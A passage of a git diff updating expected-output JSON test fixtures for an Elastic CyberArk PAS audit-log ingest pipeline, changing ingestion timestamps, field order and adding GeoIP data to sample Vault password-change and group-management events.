@@ -70,7 +70,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:41.659740900Z", + "ingested": "2021-12-14T14:42:05.852086821Z", "original": "{\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e24\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Change Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Change Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eLinux\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-test12\u003c/File\u003e\\n \u003cStation\u003e10.2.0.4\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=radiussrv.cyberark.local;username=test12;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Change Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"LINUX-SSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"test12\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"radiussrv.cyberark.local\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty 
Name=\\\"LastSuccessVerification\\\" Value=\\\"1604943844\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ChangeTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1604944158\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.6.0000\",\"MessageID\":\"24\",\"Desc\":\"CPM Change Password\",\"Severity\":\"Info\",\"IsoTimestamp\":\"2021-03-16T15:01:00Z\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Change Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Linux\",\"File\":\"Root\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-test12\",\"Station\":\"10.2.0.4\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask\",\"ExtraDetails\":\"address=radiussrv.cyberark.local;username=test12;\",\"Message\":\"CPM Change Password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"LINUX-SSH\"},{\"Name\":\"UserName\",\"Value\":\"test12\"},{\"Name\":\"Address\",\"Value\":\"radiussrv.cyberark.local\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1604943844\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1604944158\"}]}}}}", "code": "24", "kind": "event", 
@@ -174,7 +174,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:41.659748100Z", + "ingested": "2021-12-14T14:42:05.852089238Z", "original": "\u003c5\u003e1 2021-03-08T19:20:05Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 11:20:05\",\"IsoTimestamp\":\"2021-03-08T19:20:05Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"24\",\"Desc\":\"CPM Change Password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Change Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask\",\"ExtraDetails\":\"address=components;username=x_accountA;\",\"Message\":\"CPM Change Password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountA\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"SequenceID\",\"Value\":\"27\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615231204\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"1\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Inactive\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "24", "kind": "event", 
@@ -278,7 +278,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:41.659752800Z", + "ingested": "2021-12-14T14:42:05.852089841Z", "original": "\u003c5\u003e1 2021-03-10T23:39:28Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 15:39:28\",\"IsoTimestamp\":\"2021-03-10T23:39:28Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"24\",\"Desc\":\"CPM Change Password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Change Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountB\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask\",\"ExtraDetails\":\"address=components;username=x_accountB;\",\"Message\":\"CPM Change Password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountB\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"SequenceID\",\"Value\":\"25\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615419568\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"2\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Inactive\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "24", "kind": "event", 
@@ -383,7 +383,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:41.659756400Z", + "ingested": "2021-12-14T14:42:05.852090222Z", "original": "\u003c5\u003e1 2021-03-15T10:12:24Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:12:24\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:12:24Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e24\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Change Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Change Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eTest\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=components;username=x_accountA;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Change Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDesktopLocal\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"x_accountA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"components\\\"\u003e\u003c/CAProperty\u003e\\n 
\u003cCAProperty Name=\\\"SequenceID\\\" Value=\\\"28\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ChangeTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"GroupName\\\" Value=\\\"WindowsGroup\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1615803143\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Index\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DualAccountStatus\\\" Value=\\\"Inactive\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"VirtualUsername\\\" Value=\\\"virtual\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:12:24\",\"IsoTimestamp\":\"2021-03-15T10:12:24Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"24\",\"Desc\":\"CPM Change Password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Change Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask\",\"ExtraDetails\":\"address=components;username=x_accountA;\",\"Message\":\"CPM Change 
Password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountA\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"SequenceID\",\"Value\":\"28\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615803143\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"1\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Inactive\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "24", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-259-add-update-group.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-259-add-update-group.log-expected.json index e1bdf0441e2..3bb7ea6c3ec 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-259-add-update-group.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-259-add-update-group.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -45,28 +38,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "add/update group", - "ingested": "2021-12-09T13:36:42.237014100Z", + "ingested": "2021-12-14T14:42:06.479337005Z", "original": "\u003c5\u003e1 2021-03-10T09:11:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:21\",\"IsoTimestamp\":\"2021-03-10T09:11:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"259\",\"Desc\":\"Add/Update Group\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add/Update Group\",\"SourceUser\":\"PSMMaster\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add/Update Group\",\"GatewayStation\":\"\"}}}", "code": "259", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -82,6 +79,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -99,28 +101,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "add/update group", - "ingested": "2021-12-09T13:36:42.237022200Z", + "ingested": "2021-12-14T14:42:06.479339408Z", "original": "\u003c5\u003e1 2021-03-10T09:11:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:21\",\"IsoTimestamp\":\"2021-03-10T09:11:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"259\",\"Desc\":\"Add/Update Group\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add/Update Group\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add/Update Group\",\"GatewayStation\":\"\"}}}", "code": "259", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -136,6 +142,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -153,28 +164,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "add/update group", - "ingested": "2021-12-09T13:36:42.237027700Z", + "ingested": "2021-12-14T14:42:06.479339814Z", "original": "\u003c5\u003e1 2021-03-10T09:11:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:35\",\"IsoTimestamp\":\"2021-03-10T09:11:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"259\",\"Desc\":\"Add/Update Group\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add/Update Group\",\"SourceUser\":\"PSMP_ADB_AppUsers\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add/Update Group\",\"GatewayStation\":\"\"}}}", "code": "259", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -190,6 +205,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -207,14 +227,30 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "add/update group", - "ingested": "2021-12-09T13:36:42.237031800Z", + "ingested": "2021-12-14T14:42:06.479340155Z", "original": "\u003c5\u003e1 2021-03-10T17:59:29Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:59:29\",\"IsoTimestamp\":\"2021-03-10T17:59:29Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"259\",\"Desc\":\"Add/Update Group\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add/Update Group\",\"SourceUser\":\"PSMLiveSessionTerminators\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add/Update Group\",\"GatewayStation\":\"\"}}}", "code": "259", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-265-add-group-member.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-265-add-group-member.log-expected.json index a1dd3cc9ca8..62961cbca46 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-265-add-group-member.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-265-add-group-member.log-expected.json 
@@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -46,28 +39,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "add group member", - "ingested": "2021-12-09T13:36:42.577462300Z", + "ingested": "2021-12-14T14:42:06.913524500Z", "original": "\u003c5\u003e1 2021-03-10T09:11:22Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:22\",\"IsoTimestamp\":\"2021-03-10T09:11:22Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMAppUsers\",\"TargetUser\":\"PSMPApp_localhost.localdomain\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -83,6 +80,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -101,28 +103,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "add group member", - "ingested": "2021-12-09T13:36:42.577470900Z", + "ingested": "2021-12-14T14:42:06.913527018Z", "original": "\u003c5\u003e1 2021-03-10T09:11:22Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:22\",\"IsoTimestamp\":\"2021-03-10T09:11:22Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PVWAGWAccounts\",\"TargetUser\":\"PSMPGW_localhost.localdomain\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -138,6 +144,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -156,28 +167,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "add group member", - "ingested": "2021-12-09T13:36:42.577476600Z", + "ingested": "2021-12-14T14:42:06.913527509Z", "original": "\u003c5\u003e1 2021-03-10T09:11:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:35\",\"IsoTimestamp\":\"2021-03-10T09:11:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMP_ADB_AppUsers\",\"TargetUser\":\"PSMP_ADB_localhost.localdomain\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -193,6 +208,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -211,28 +231,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "add group member", - "ingested": "2021-12-09T13:36:42.577481900Z", + "ingested": "2021-12-14T14:42:06.913527900Z", "original": "\u003c5\u003e1 2021-03-10T17:58:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 09:58:01\",\"IsoTimestamp\":\"2021-03-10T17:58:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"265\",\"Desc\":\"Add Group Member\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Group Member\",\"SourceUser\":\"PSMMaster\",\"TargetUser\":\"Administrator\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Group Member\",\"GatewayStation\":\"\"}}}", "code": "265", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -248,6 +272,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
